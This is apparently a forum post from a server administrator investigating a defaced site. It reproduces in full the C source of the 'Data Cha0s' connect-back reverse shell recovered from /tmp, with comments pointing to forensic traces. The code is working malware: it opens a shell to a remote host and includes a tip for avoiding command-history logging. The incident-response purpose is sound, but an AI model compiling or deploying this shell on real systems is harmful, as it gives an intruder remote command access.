One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other changes visible. The user is unlikely to have carried out the exploit himself.
phpsuexec, suexec and php_basedir are all enabled.
No FTP activity for that account was listed in /var/log/messages.
No processes are running by that user.
Does anybody know how this attack was carried out, and where to look for more evidence?
/tmp is mounted as noexec, and
root@server [/tmp]# /scripts/securetmp
/tmp is already secure
/var/tmp is already secure
Process Complete
However, it looks like this file was compiled and run. This file and its binary were in /tmp, owned by that user:
root@server [/tmp]# more dc-connectback.c
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
/*
 * Connect-back ("reverse") shell recovered from /tmp on the compromised
 * account. The code is reproduced unchanged; the comments below describe
 * what each step does and what it leaves behind for an investigator.
 *
 * argv[1] is the remote host (name or dotted address), argv[2] an optional
 * TCP port (default 80). On success a child process attaches /bin/sh to a
 * TCP connection that THIS machine opened outbound to that address, which
 * is why no inbound listener, login session or FTP transfer is recorded
 * for the account.
 */
int main(int argc, char **argv) {
char *host;
int port = 80;    /* destination port used when argv[2] is absent */
int f;            /* fork() result */
int l;            /* strlen(argv[1]) */
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;   /* 'from' is never used */
struct hostent *he;
/*
 * Banner written to the remote end before the shell starts (see the
 * write() in the child below). The literal text is a reliable signature
 * for a captured session or for `strings` run over a recovered binary.
 */
char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
/* All status output goes to the local stdout, i.e. whatever ran the binary. */
printf("Data Cha0s Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port>\n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
/*
 * Copies argv[1] into a buffer of exactly l bytes; strncpy with length l
 * leaves no room for a terminating NUL, yet host is then used as a C
 * string by gethostbyname()/inet_addr()/printf(). Reproduced as found.
 */
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
/* DNS lookup first (a resolver query may appear in DNS logs), then a
 * dotted-quad fallback via inet_addr(). */
printf("[*] Resolving Host Name\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
/*
 * Outbound TCP connect from the server to the attacker-controlled
 * host:port. Evidence of it lives in egress firewall/conntrack logs and
 * in any NetFlow or proxy records, not in the usual login logs.
 */
printf("[*] Connecting...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
/*
 * Child: send the banner, point stdin/stdout/stderr at the socket and
 * replace the process image with /bin/sh. argv[0] is set to "shell",
 * so while it is alive the process shows up under that name with file
 * descriptors 0-2 all bound to one TCP socket (visible in
 * /proc/<pid>/fd and in `lsof -i` / `netstat -p` style listings).
 */
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
/* Reached only if execl() fails. */
close(sock);
return 0;
}
/* Parent exits immediately; the shell child continues on its own. */
printf("[*] Detached\n\n");
return 0;
}








